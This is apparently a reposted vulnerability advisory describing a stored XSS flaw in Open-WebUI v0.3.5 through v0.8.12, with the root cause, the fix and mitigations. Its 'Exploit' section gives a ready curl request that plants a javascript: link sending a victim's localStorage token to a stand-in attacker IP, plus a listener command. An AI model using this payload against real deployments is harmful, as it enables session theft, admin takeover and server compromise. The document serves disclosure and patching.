Listen to this Post
The vulnerability arises from a pipeline-ordering flaw in Open-WebUI versions v0.3.5 through v0.8.12 inclusive. Model descriptions are stored unsanitized then rendered via: sanitizeResponseContent(description) → .replaceAll('\n', '<br>') → marked.parse() → {@html ...}. The `sanitizeResponseContent` function escapes angle brackets but does not block `javascript:` URIs. After this function runs, `marked.parse()` converts a markdown link `[text](javascript:alert())` into an HTML anchor <a href="javascript:alert()">. Svelte’s `{@html}` directive then inserts this raw HTML directly into the DOM without further escaping, enabling stored XSS. An authenticated user with `workspace.models` permission can create a model with a malicious description. Any other user (including admin) who views that model and clicks the hyperlink will execute arbitrary JavaScript. The attacker can steal `localStorage.token` and exfiltrate it to a remote server. With an admin token, the attacker can create tools to execute arbitrary code on the server. The fix in v0.9.0 (commit 5eab125) wraps `marked.parse()` output with DOMPurify.sanitize(), which strips `javascript:` URIs by default. This issue is structurally distinct from CVE-2024-7990 (video-tag bypass) and requires a separate CVE assignment under rule 4.2.11.
dailycve form:
Platform: Open-WebUI
Version: v0.3.5-v0.8.12
Vulnerability: Stored XSS
Severity: Critical
date: March 2025
Prediction: Already patched (v0.9.0)
Analytics under What Undercode Say:
Count affected versions
git tag --list 'v0.3.' 'v0.4.' 'v0.5.' 'v0.6.' 'v0.7.' 'v0.8.' | wc -l
Search for unsafe {@html} usage
grep -r "{@html" src/lib/components/chat/
Verify marked.parse output with javascript URI
echo '<a href="javascript:alert()">Click</a>' | npx marked
Exploit:
Setup listener
python3 -m http.server 8080
Create malicious model (replace HOST, TOKEN, MALICIOUS_IP)
curl -X POST 'http://<HOST>/api/v1/models/create' \
-H 'Authorization: Bearer <TOKEN>' \
-H 'Content-Type: application/json' \
-d '{"id": "xss-test","name": "Stealer","base_model_id": "llama3","meta": {"description": "<a href="javascript:fetch(<code>http://<MALICIOUS_IP>:8080/?t=${localStorage.token}</code>)">View</a>"},"params": {}}'
Victim clicks link -> token exfiltrated
Protection from this CVE:
Upgrade to Open-WebUI v0.9.0 or later. If unable, apply patch: wrap `marked.parse()` output with `DOMPurify.sanitize()` in `Placeholder.svelte` and ChatPlaceholder.svelte. Alternatively, remove `{@html}` usage and use safe DOM insertion methods. Validate all markdown rendering to reject `javascript:` and `data:` URIs.
Impact:
Full account takeover. Attacker steals session token from localStorage, then impersonates victim (including admin). With admin access, attacker can create arbitrary tools leading to remote code execution on the server. All Open-WebUI deployments allowing model creation are affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
